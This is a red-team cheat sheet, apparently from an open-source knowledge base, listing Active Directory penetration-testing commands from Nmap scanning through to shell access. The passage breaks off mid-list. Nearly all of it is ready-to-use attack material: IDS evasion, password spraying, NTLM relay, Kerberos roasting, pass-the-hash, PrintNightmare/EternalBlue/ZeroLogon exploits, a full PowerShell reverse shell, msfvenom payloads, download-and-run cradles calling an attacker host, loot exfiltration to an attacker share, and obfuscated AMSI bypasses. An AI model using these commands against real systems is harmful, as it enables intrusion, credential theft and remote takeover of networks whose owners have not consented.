Onyx
Open Source Red Team Knowledge Base

Onyx is open source. Contribute commands, improve notes, and help turn the repo into a sharper field reference.

If it saves you time during labs, assessments, or internal ops, leave a star on GitHub and contribute fixes or new cheat sheets. Better visibility brings better contributions.


ad-pentest-nmap-to-shell

Reconnaissance - Nmap

Basic Scans

bash
# Variables (define once)
export IP=10.10.10.10
export SUBNET=10.10.10.0/24
export DOMAIN=domain.local
export DC=DC01.domain.local

# Host discovery (no port scan)
nmap -sn $SUBNET -oG alive_hosts.txt
nmap -sn $SUBNET --open | grep "Nmap scan report" | awk '{print $5}'

# Quick top 1000 port scan
nmap -sC -sV -O 10.10.10.10 -oA nmap_initial

# Full all ports scan (slow but thorough)
nmap -p- --min-rate 5000 10.10.10.10 -oA nmap_allports

# Aggressive scan (OS + Version + Scripts + Traceroute)
nmap -A -T4 10.10.10.10 -oA nmap_aggressive

# UDP scan (top 20 UDP ports)
nmap -sU --top-ports 20 10.10.10.10

AD-Specific Scan (All AD Ports at Once)

bash
# Main AD ports
nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,5986,9389,49152-65535 \
     -sC -sV -O 10.10.10.10 -oA nmap_ad_full

# Full network scan to identify DCs
nmap -p 88,389,636,3268 --open $SUBNET -oG dcs.txt
grep "open" dcs.txt | awk '{print $2}'

NSE Scripts by Service

bash
# SMB
nmap -p 445 --script smb-os-discovery 10.10.10.10
nmap -p 445 --script smb-enum-users 10.10.10.10
nmap -p 445 --script smb-enum-shares 10.10.10.10
nmap -p 445 --script smb-enum-domains 10.10.10.10
nmap -p 445 --script smb-enum-sessions 10.10.10.10
nmap -p 445 --script smb-enum-processes 10.10.10.10
nmap -p 445 --script smb-ls --script-args smb-ls.shares=C$ 10.10.10.10
nmap -p 445 --script smb2-security-mode 10.10.10.10
nmap -p 445 --script smb-security-mode 10.10.10.10
nmap -p 445 --script smb-protocols 10.10.10.10
# SMB vulnerability scan
nmap -p 445 --script smb-vuln-ms17-010 10.10.10.10
nmap -p 445 --script smb-vuln-ms08-067 10.10.10.10
nmap -p 445 --script smb-vuln-regsvc-dos 10.10.10.10
nmap -p 445 --script "smb-vuln*" 10.10.10.10

# LDAP
nmap -p 389 --script ldap-rootdse 10.10.10.10
nmap -p 389 --script ldap-search --script-args 'ldap.base="dc=domain,dc=local"' 10.10.10.10
nmap -p 389,636 --script ldap-search \
     --script-args 'ldap.username="CN=user,DC=domain,DC=local",ldap.password=pass,ldap.base="DC=domain,DC=local"' 10.10.10.10

# Kerberos
nmap -p 88 --script krb5-enum-users \
     --script-args krb5-enum-users.realm="domain.local",userdb=/usr/share/seclists/Usernames/Names/names.txt 10.10.10.10

# RPC
nmap -p 135 --script msrpc-enum 10.10.10.10

# WinRM
nmap -p 5985,5986 --script http-auth-finder 10.10.10.10
nmap -p 5985 --script http-winrm-info 10.10.10.10

# RDP
nmap -p 3389 --script rdp-enum-encryption 10.10.10.10
nmap -p 3389 --script rdp-ntlm-info 10.10.10.10
nmap -p 3389 --script rdp-vuln-ms12-020 10.10.10.10
nmap -p 3389 --script "rdp-*" 10.10.10.10

# DNS
nmap -p 53 --script dns-zone-transfer --script-args dns-zone-transfer.domain=domain.local 10.10.10.10
nmap -p 53 --script dns-brute --script-args dns-brute.domain=domain.local 10.10.10.10
nmap -p 53 --script dns-recursion 10.10.10.10
nmap -p 53 --script dns-service-discovery 10.10.10.10

# MSSQL
nmap -p 1433 --script ms-sql-info 10.10.10.10
nmap -p 1433 --script ms-sql-config 10.10.10.10
nmap -p 1433 --script ms-sql-empty-password 10.10.10.10
nmap -p 1433 --script ms-sql-ntlm-info 10.10.10.10
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args "mssql.username=sa,mssql.password=,ms-sql-xp-cmdshell.cmd=whoami" 10.10.10.10

# HTTP/HTTPS
nmap -p 80,443,8080,8443 --script http-title,http-headers,http-server-header 10.10.10.10
nmap -p 80,443 --script http-vuln-cve2017-5638 10.10.10.10
nmap -p 80,443 --script "http-auth*" 10.10.10.10

# Full AD All Scripts
nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,1433 \
     --script smb-enum-shares,smb-enum-users,ldap-rootdse,ldap-search,\
krb5-enum-users,smb-os-discovery,smb-vuln-ms17-010,smb-enum-domains,\
smb-enum-sessions,smb2-security-mode,msrpc-enum,rdp-enum-encryption,\
rdp-ntlm-info,ssl-cert,ms-sql-info,smb-protocols \
     10.10.10.10 -oA nmap_full_ad

IDS/IPS Evasion

bash
# Slow scan (avoid detection)
nmap -T1 -p 445,389,88 10.10.10.10
nmap -T2 -p 445,389,88 10.10.10.10
nmap --scan-delay 5s 10.10.10.10

# Packet fragmentation
nmap -f 10.10.10.10
nmap -ff 10.10.10.10
nmap --mtu 16 10.10.10.10

# Decoys (mask source)
nmap -D RND:10 10.10.10.10
nmap -D 192.168.1.5,192.168.1.6,ME 10.10.10.10

# Source spoofing (requires low-level network access)
nmap -S 192.168.1.100 -e eth0 10.10.10.10

# Source port firewall bypass
nmap --source-port 53 10.10.10.10
nmap --source-port 88 10.10.10.10

# Scan via proxy
nmap --proxies socks4://127.0.0.1:9050 10.10.10.10

# Slow + fragmentation + decoys
nmap -T2 -f -D RND:5 --source-port 88 -p 445,389,88,3389 10.10.10.10

Service Enumeration

netexec / crackmapexec

bash
# Network discovery
netexec smb $SUBNET
netexec smb $SUBNET --gen-relay-list relay_targets.txt

# SMB Null Session
netexec smb 10.10.10.10 -u '' -p '' --shares
netexec smb 10.10.10.10 -u '' -p '' --users
netexec smb 10.10.10.10 -u '' -p '' --groups
netexec smb 10.10.10.10 -u 'guest' -p '' --shares

# SMB with credentials
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' --shares
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' --sessions
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' --loggedon-users
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' --pass-pol
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' --local-groups
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' --computers
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' --rid-brute

# LDAP
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' --users
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' --groups
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' --password-not-required
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' --admin-count
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' --trusted-for-delegation
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' -M get-desc-users
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' -M ldap-signing
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' -M adcs
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' -M laps
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' -M maq
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' -M find-delegation

# WinRM
netexec winrm 10.10.10.10 -u administrator -p 'P@ssw0rd'
netexec winrm $SUBNET -u administrator -p 'P@ssw0rd'

# RDP
netexec rdp 10.10.10.10 -u administrator -p 'P@ssw0rd'
netexec rdp $SUBNET -u administrator -p 'P@ssw0rd'

# MSSQL
netexec mssql $SUBNET -u '' -p ''
netexec mssql 10.10.10.10 -u sa -p '' --local-auth
netexec mssql 10.10.10.10 -u administrator -p 'P@ssw0rd' --local-auth -q "SELECT name FROM sys.databases;"

# Command execution
netexec smb 10.10.10.10 -u admin -p 'P@ssw0rd' -x "whoami"
netexec smb 10.10.10.10 -u admin -p 'P@ssw0rd' -X "whoami"
netexec winrm 10.10.10.10 -u admin -p 'P@ssw0rd' -x "whoami"
netexec mssql 10.10.10.10 -u sa -p 'P@ssw0rd' -x "whoami"

# Useful modules
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' -M gpp_password
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' -M gpp_autologin
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' -M ms17-010
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' -M bluekeep
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' -M spider_plus
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' -M zerologon
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' -M petitpotam
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' -M nopac
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' -M printerbug

enum4linux-ng

bash
# Full enumeration
enum4linux-ng -A 10.10.10.10 -oA enum4linux_output
enum4linux-ng -A 10.10.10.10
enum4linux -a 10.10.10.10

# Specific options
enum4linux -U 10.10.10.10
enum4linux -G 10.10.10.10
enum4linux -S 10.10.10.10
enum4linux -P 10.10.10.10
enum4linux -i 10.10.10.10
enum4linux -r 10.10.10.10
enum4linux -R 500-1200 10.10.10.10

rpcclient

bash
rpcclient -U "" -N 10.10.10.10
rpcclient -U "domain.local\administrator%P@ssw0rd" 10.10.10.10

# Inside rpcclient
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> enumalsgroups domain
rpcclient $> querydominfo
rpcclient $> getdompwinfo
rpcclient $> querydispinfo
rpcclient $> queryuser 0x1f4
rpcclient $> querygroup 0x200
rpcclient $> queryusergroups 0x1f4
rpcclient $> lookupnames administrator
rpcclient $> lsaquery
rpcclient $> lsaenumsid
rpcclient $> dsroledominfo

# RID brute-force (find all users)
for i in $(seq 500 1200); do
  result=$(rpcclient -U "" -N 10.10.10.10 -c "queryuser $(printf '0x%x' $i)" 2>/dev/null | grep "User Name")
  [ -n "$result" ] && echo "RID $i: $result"
done

ldapsearch / ldapdomaindump

bash
# Test anonymous bind
ldapsearch -H ldap://10.10.10.10 -x -s base namingcontexts
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" "(objectClass=*)" | head -100

# Full dump
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" "(objectClass=administrator)" \
           sAMAccountName givenName sn description memberOf userAccountControl pwdLastSet | \
           tee ldap_users.txt

ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" "(objectClass=group)" \
           cn member distinguishedName | tee ldap_groups.txt

# Search for passwords in descriptions
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" \
           "(description=*pass*)" sAMAccountName description

# Find accounts without Kerberos pre-auth
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" \
           "(&(objectClass=administrator)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" sAMAccountName

# Find accounts with SPN (Kerberoastable)
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" \
           "(&(objectClass=administrator)(servicePrincipalName=*))" sAMAccountName servicePrincipalName

# With credentials
ldapsearch -H ldap://10.10.10.10 -D "domain.local\administrator" -w 'P@ssw0rd' \
           -b "DC=domain,DC=local" "(objectClass=administrator)" sAMAccountName description

# ldapdomaindump (HTML + JSON output)
ldapdomaindump -u "domain.local\administrator" -p 'P@ssw0rd' ldap://10.10.10.10 -o /tmp/ldap_dump/
firefox /tmp/ldap_dump/domain_users.html

User Enumeration

Kerbrute (No Credentials)

bash
# User enumeration
kerbrute userenum -d domain.local --dc 10.10.10.10 \
         /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt \
         -o valid_users.txt -t 50

kerbrute userenum -d domain.local --dc 10.10.10.10 \
         /usr/share/seclists/Usernames/Names/names.txt \
         -o valid_users.txt

# With custom wordlist (first.last format)
kerbrute userenum -d domain.local --dc 10.10.10.10 users_custom.txt -o valid_users.txt --downgrade

# P@ssw0rd spray (CHECK POLICY FIRST!)
kerbrute passwordspray -d domain.local --dc 10.10.10.10 valid_users.txt 'Welcome1!'
kerbrute passwordspray -d domain.local --dc 10.10.10.10 valid_users.txt 'Password2024!'
kerbrute passwordspray -d domain.local --dc 10.10.10.10 valid_users.txt 'Spring2025@'
kerbrute passwordspray -d domain.local --dc 10.10.10.10 valid_users.txt "domain.local" --delay 3000

# Targeted brute force
kerbrute bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt targetuser

Username Generation

bash
# Generate usernames from a name list
# Format: first.last, flast, firstl, etc.
username-anarchy -f users.txt --format first.last > usernames_fl.txt
username-anarchy -f users.txt --format flast > usernames_fl2.txt

# Manual generation
awk '{print tolower($1"."$2)}' names.txt > usernames.txt
awk '{print tolower(substr($1,1,1)$2)}' names.txt
awk '{print tolower($1)}' names.txt

Controlled Password Spraying

bash
# ALWAYS check password policy FIRST
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd --pass-pol
enum4linux -P 10.10.10.10
rpcclient -U "" -N 10.10.10.10 -c "getdompwinfo"

# CrackMapExec / NetExec spray (one password at a time!)
netexec smb 10.10.10.10 -u valid_users.txt -p 'Welcome1!' --continue-on-success
netexec smb 10.10.10.10 -u valid_users.txt -p 'Password2024!' --continue-on-success
netexec ldap 10.10.10.10 -u valid_users.txt -p 'Welcome1!' --continue-on-success

# Multi-password spray WITHOUT lockout (1:1 ratio)
netexec smb 10.10.10.10 -u users.txt -p passwords.txt --no-bruteforce --continue-on-success

# Spray local accounts
netexec smb $SUBNET -u administrator -p 'Welcome1!' --local-auth --continue-on-success

LLMNR/NBT-NS Poisoning (Hash Capture)

Responder

bash
# Analyze network (passive mode, nothing is sent)
sudo responder -I eth0 -A

# Active mode (responds to LLMNR/NBT-NS requests)
sudo responder -I eth0 -wdPv

# Responder + SMB disabled (for relay)
# Edit /etc/responder/Responder.conf: SMB = Off, HTTP = Off
sudo nano /etc/responder/Responder.conf
sudo responder -I eth0 -wd

# View captured hashes
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt
ls /usr/share/responder/logs/

Cracking Captured Hashes

bash
# NTLMv2 (mode 5600)
hashcat -m 5600 ntlmv2_hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 5600 ntlmv2_hashes.txt rockyou.txt --rules-file best64.rule
hashcat -m 5600 ntlmv2_hashes.txt rockyou.txt -r OneRuleToRuleThemAll.rule
john --format=netntlmv2 --wordlist=rockyou.txt ntlmv2_hashes.txt

# NTLMv1 (mode 5500) - rarer but faster to crack
hashcat -m 5500 ntlmv1_hashes.txt rockyou.txt

# NTHash (mode 1000)
hashcat -m 1000 nthashes.txt rockyou.txt
hashcat -m 1000 nthashes.txt rockyou.txt --rules-file best64.rule

SMB Relay (ntlmrelayx)

bash
# List targets without SMB signing
nmap -p 445 --script smb2-security-mode $SUBNET | grep -B3 "not required"
netexec smb $SUBNET --gen-relay-list relay_targets.txt

# Basic relay → auto SAM dump
impacket-ntlmrelayx -tf relay_targets.txt -smb2support

# Relay + command execution
impacket-ntlmrelayx -tf relay_targets.txt -smb2support \
                    -c "powershell -enc BASE64REVSHELL"

# Relay + interactive shell
impacket-ntlmrelayx -tf relay_targets.txt -smb2support -i

# Relay → LDAP (add admin administrator)
impacket-ntlmrelayx -t ldap://10.10.10.10 --escalate-administrator compromised_user

# Relay → LDAPS (create computer account)
impacket-ntlmrelayx -t ldaps://10.10.10.10 --add-computer EvilPC --computer-password 'P@ssw0rd!'

# mitm6 + LDAP Relay (IPv6)
sudo mitm6 -d domain.local &
impacket-ntlmrelayx -6 -t ldaps://10.10.10.10 -wh fakewpad.domain.local \
                    --add-computer EvilPC --computer-password 'P@ss!'

Kerberos Exploitation (No Prior Shell)

AS-REP Roasting (No Credentials Required, Given a List of Valid Users)

bash
# Dump AS-REP hashes
impacket-GetNPUsers domain.local/ -dc-ip 10.10.10.10 -no-P@ssw0rd -usersfile valid_users.txt \
                   -format hashcat -outputfile asrep.hashes

impacket-GetNPUsers domain.local/ -dc-ip 10.10.10.10 -no-P@ssw0rd -request \
                   -usersfile valid_users.txt -outputfile asrep.hashes

# Crack
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 18200 asrep.hashes rockyou.txt -r OneRuleToRuleThemAll.rule
john --format=krb5asrep --wordlist=rockyou.txt asrep.hashes

Kerberoasting (With Basic Credentials)

bash
# Dump TGS tickets (SPNs)
impacket-GetUserSPNs domain.local/administrator:P@ssw0rd -dc-ip 10.10.10.10 -request \
                     -outputfile kerb.hashes

# Targeted
impacket-GetUserSPNs domain.local/administrator:P@ssw0rd -dc-ip 10.10.10.10 -request-administrator svcSQL \
                     -outputfile kerb_sql.hashes

# Crack
hashcat -m 13100 kerb.hashes rockyou.txt
hashcat -m 19700 kerb.hashes rockyou.txt
john --format=krb5tgs --wordlist=rockyou.txt kerb.hashes

Credential Exploitation

Validation and Verification

bash
# Test credentials on all protocols
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd'
netexec winrm 10.10.10.10 -u administrator -p 'P@ssw0rd'
netexec rdp 10.10.10.10 -u administrator -p 'P@ssw0rd'
netexec mssql 10.10.10.10 -u administrator -p 'P@ssw0rd'
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd'

# Test NTLM hash
netexec smb 10.10.10.10 -u administrator -H NTLMHASH
netexec smb 10.10.10.10 -u Administrator -H NTLMHASH --local-auth
netexec smb $SUBNET -u Administrator -H NTLMHASH --local-auth --continue-on-success

# Check if admin
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' | grep -i "pwn3d\|admin"

Pass-the-Hash

bash
# Impacket PsExec → SYSTEM shell
impacket-psexec domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH
impacket-psexec domain.local/administrator@10.10.10.10 -hashes :NTLMHASH

# Impacket smbexec → cmd shell
impacket-smbexec domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH

# Impacket wmiexec → semi-interactive
impacket-wmiexec domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH

# Impacket atexec → exec via scheduler
impacket-atexec domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH "whoami"

# Evil-WinRM → PowerShell shell
evil-winrm -i 10.10.10.10 -u Administrator -H NTLMHASH

# xfreerdp → GUI session
xfreerdp /v:10.10.10.10 /u:Administrator /pth:NTLMHASH /cert-ignore /dynamic-resolution

Shell Access

Via SMB (psexec / smbexec)

bash
# psexec → SYSTEM shell via SMBExec (creates a service)
impacket-psexec domain.local/administrator:P@ssw0rd@10.10.10.10
impacket-psexec domain.local/administrator:P@ssw0rd@10.10.10.10 cmd.exe
impacket-psexec domain.local/administrator:P@ssw0rd@10.10.10.10 powershell
impacket-psexec domain.local/administrator@10.10.10.10 -hashes :NTLMHASH

# smbexec → Shell via temporary SMB share (stealthier than psexec)
impacket-smbexec domain.local/administrator:P@ssw0rd@10.10.10.10
impacket-smbexec domain.local/administrator@10.10.10.10 -hashes :NTLMHASH

# wmiexec → Shell via WMI (no service creation, stealthier)
impacket-wmiexec domain.local/administrator:P@ssw0rd@10.10.10.10
impacket-wmiexec domain.local/administrator@10.10.10.10 -hashes :NTLMHASH

# dcomexec → Shell via DCOM
impacket-dcomexec domain.local/administrator:P@ssw0rd@10.10.10.10 -object MMC20
impacket-dcomexec domain.local/administrator:P@ssw0rd@10.10.10.10 -object ShellBrowserWindow

# Check if session is SYSTEM or admin
impacket-psexec domain.local/administrator:P@ssw0rd@10.10.10.10 -c "whoami && whoami /priv"

Via WinRM

bash
# evil-winrm (full PowerShell shell)
evil-winrm -i 10.10.10.10 -u administrator -p 'P@ssw0rd'
evil-winrm -i 10.10.10.10 -u administrator -H NTLMHASH
evil-winrm -i 10.10.10.10 -u administrator -p 'P@ssw0rd' -s /opt/scripts/
evil-winrm -i 10.10.10.10 -u administrator -p 'P@ssw0rd' -e /opt/exes/

# Inside evil-winrm:
menu
Invoke-Binary /opt/exes/SharpHound.exe
upload /local/path /remote/path
download C:\loot\hash.txt /local/
bypass-4msi

# Via Impacket
impacket-wmiexec domain.local/administrator:P@ssw0rd@10.10.10.10 -shell-type powershell

Via RDP

bash
# xfreerdp (Linux)
xfreerdp /v:10.10.10.10 /u:administrator /p:'P@ssw0rd' /cert-ignore /dynamic-resolution
xfreerdp /v:10.10.10.10 /u:administrator /p:'P@ssw0rd' /cert-ignore +clipboard /drive:share,/tmp
xfreerdp /v:10.10.10.10 /u:Administrator /pth:NTLMHASH /cert-ignore

# rdesktop
rdesktop -u administrator -p 'P@ssw0rd' 10.10.10.10
rdesktop -u 'domain.local\administrator' -p 'P@ssw0rd' 10.10.10.10

# remmina (GUI)
remmina -c rdp://administrator:P@ssw0rd@10.10.10.10

Via MSSQL

bash
# impacket-mssqlclient → SQL shell + xp_cmdshell
impacket-mssqlclient domain.local/administrator:P@ssw0rd@10.10.10.10 -windows-auth
impacket-mssqlclient sa:P@ssw0rd@10.10.10.10
impacket-mssqlclient domain.local/administrator@10.10.10.10 -hashes :NTLMHASH -windows-auth
sql
-- Enable xp_cmdshell then get reverse shell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'powershell -enc BASE64_REVERSE_SHELL';
bash
# Via netexec
netexec mssql 10.10.10.10 -u sa -p 'P@ssw0rd' --local-auth -x "whoami"

Via PrintNightmare - SYSTEM Shell

bash
# Check vulnerability
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' -M printnightmare

# Linux → RCE via DLL
python3 CVE-2021-1675.py domain.local/administrator:P@ssw0rd@10.10.10.10 \
        '\\10.10.14.1\share\evil.dll'
powershell
# Windows → Add local admin
.\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "hacker" -NewPassword "P@ssw0rd!"
bash
# After → Connect with the new account
evil-winrm -i 10.10.10.10 -u hacker -p 'P@ssw0rd!'

Via EternalBlue (MS17-010) - SYSTEM

bash
# Check
nmap -p 445 --script smb-vuln-ms17-010 10.10.10.10
netexec smb 10.10.10.10 -u '' -p '' -M ms17-010

# Metasploit
msfconsole -q
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 10.10.10.10
set LHOST 10.10.14.1
set LPORT 4444
run

# Manual (Impacket)
# Listen: nc -lvnp 4444
python3 zzz_exploit.py 10.10.10.10

Via ZeroLogon (CVE-2020-1472) - DC SYSTEM

bash
# Scan
netexec smb 10.10.10.10 -u '' -p '' -M zerologon
python3 zerologon_tester.py DC_NETBIOS_NAME 10.10.10.10

# Exploit (reset DC machine account password → empty)
python3 cve-2020-1472-exploit.py DC_NETBIOS_NAME 10.10.10.10

# Dump all hashes via secretsdump
impacket-secretsdump -no-P@ssw0rd -just-dc domain.local/DC_NETBIOS_NAME\$@10.10.10.10

# RESTORE THE PASSWORD (important even in lab!)
python3 restorepassword.py domain.local/DC_NETBIOS_NAME@DC_NETBIOS_NAME \
        -target-ip 10.10.10.10 -hexpass ORIGINAL_HEX_PASS

Reverse Shell Payloads

bash
# Prepare the listener
nc -lvnp 4444
rlwrap nc -lvnp 4444
powershell
# PowerShell reverse shell (raw command, encode in base64)
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.1",4444);
$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
  $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
  $sendback = (iex $data 2>&1 | Out-String );
  $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
  $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
  $stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()
};$client.Close()
bash
# Encode in base64 (from Linux)
python3 -c "
import base64
cmd='$client = New-Object System.Net.Sockets.TCPClient(\"10.10.14.1\",4444);...'
enc = base64.b64encode(cmd.encode('utf-16-le')).decode()
print(enc)"

# Launch the encoded shell
powershell -nop -w hidden -enc <BASE64>

# Nishang OneLiners - Load and execute Invoke-PowerShellTcp
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.1/Invoke-PowerShellTcp.ps1')
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.1 -Port 4444

# ConPtyShell (full interactive shell)
# On attacker: stty raw -echo; nc -lvnp 4444
IEX(IWR http://10.10.14.1/Invoke-ConPtyShell.ps1 -UseBasicParsing)
Invoke-ConPtyShell 10.10.14.1 4444

# MSFVenom payloads
# EXE
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe > shell.exe
# Staged (Meterpreter)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe > meter.exe
# DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f dll > evil.dll
# PowerShell (base64)
msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.14.1 LPORT=4444

# Upload and execute
# Simple HTTP server (attacker)
python3 -m http.server 80
python3 -m http.server 8080

# Download from Windows (victim)
certutil -urlcache -f http://10.10.14.1/shell.exe C:\Windows\Temp\shell.exe
powershell -c "Invoke-WebRequest http://10.10.14.1/shell.exe -OutFile C:\Windows\Temp\shell.exe"
powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.14.1/shell.exe','C:\Windows\Temp\shell.exe')"
bitsadmin /transfer job /download /priority high http://10.10.14.1/shell.exe C:\Windows\Temp\shell.exe

# Execute
C:\Windows\Temp\shell.exe
Start-Process C:\Windows\Temp\shell.exe

Shell Upgrade - Interactive Shell

bash
# Python PTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'

# Full TTY upgrade
# In the basic shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl+Z (suspend)
stty raw -echo; fg
# In the shell:
export TERM=xterm-256color
stty rows 50 columns 200

# rlwrap
rlwrap nc -lvnp 4444

# socat (full TTY from the start)
# Attacker:
socat file:`tty`,raw,echo=0 tcp-listen:4444
# Victim (PowerShell):
socat exec:'cmd.exe',pty,stderr tcp:10.10.14.1:4444

Immediate Post-Exploitation (From Shell)

Quick Post-Shell Enumeration

powershell
# Who am I?
whoami /all
whoami /priv
net administrator %username% /domain
echo %logonserver%
ipconfig /all
systeminfo
hostname

# Network topology
ipconfig /all
route print
arp -a
netstat -ano
netsh firewall show state

# Quick credential search
dir /s *pass* *cred* *secret* *.config 2>nul
findstr /si "password" *.xml *.ini *.txt *.config 2>nul
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

BloodHound Collection (From Shell)

powershell
# SharpHound (Windows) - collect all AD data
.\SharpHound.exe -c all --zipfilename bhdata.zip
.\SharpHound.exe -c All,GPOLocalGroup --outputdirectory C:\Windows\Temp\
bash
# Bloodhound-python (from Linux with credentials)
bloodhound-python -d domain.local -dc DC01 -c All \
                  -u administrator -p 'P@ssw0rd' --zip -o /tmp/bh/
bloodhound-python -d domain.local -dc DC01 -c All \
                  -u administrator --hashes :NTLMHASH --zip

# Copy results to attacker
# Via evil-winrm:
download C:\Windows\Temp\bhdata.zip /tmp/bhdata.zip
# Via SMB:
copy C:\Windows\Temp\bhdata.zip \\10.10.14.1\share\

# Import into BloodHound
# Start neo4j and bloodhound
sudo neo4j start
bloodhound &
# Drag and drop the zip into BloodHound

PowerView from Shell

powershell
# Load in memory
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.1/PowerView.ps1')

# Quick enumeration
Get-DomainComputer | select dnshostname,operatingsystem
Get-DomainUser | select samaccountname,description,memberof
Get-DomainUser -SPN | select name,serviceprincipalname
Get-DomainUser -PreauthNotRequired | select name
Get-DomainGroupMember "Domain Admins" | select membername
Get-DomainTrust
Find-DomainShare -CheckShareAccess
Find-InterestingDomainAcl -ResolveGUIDs | select IdentityReferenceName,ActiveDirectoryRights,ObjectDN
Get-DomainComputer -Unconstrained | select name
Get-DomainUser -TrustedToAuth | select name,msds-allowedtodelegateto

ad-pentesting-by-service-privesc

Preparation and Evasion

Attacker Setup

bash
# Map the DC hostname and the domain name to the DC's IP in /etc/hosts
printf '%s\n' "10.10.10.10 DC01.domain.local domain.local" >> /etc/hosts

# Write the Kerberos client configuration for the lab realm (Linux)
# The delimiter is quoted: the file contains no shell expansions, so it is
# written literally.
cat > /etc/krb5.conf <<'EOF'
[libdefaults]
    default_realm = domain.local
    dns_lookup_realm = false
    dns_lookup_kdc = false
[realms]
    domain.local = {
        kdc = 10.10.10.10
        admin_server = 10.10.10.10
    }
[domain_realm]
    .domain.local = domain.local
    domain.local = domain.local
EOF

AMSI Bypass

powershell
# Classic bypass
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Alternative obfuscated bypass
$a=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUtils')
$b=$a.GetField('amsi'+'InitFailed','NonPublic,Static')
$b.SetValue($null,$true)

# Via WLDP
$w=[Ref].Assembly.GetType('System.Management.Automation.WldpNativeMethods')
$f=$w.GetField('_wldpIsScriptFileTrusted','NonPublic,Static')
$f.SetValue($null, $null)

Execution Policy Bypass

powershell
powershell -ep bypass
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.1/shell.ps1')"
# Base64 encoded
$cmd = 'IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.1/ps.ps1")'
$enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cmd))
powershell -EncodedCommand $enc

Reflective Loading (No Disk)

powershell
# Load PowerView in memory
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.1/PowerView.ps1')
# Via certutil (proxy bypass)
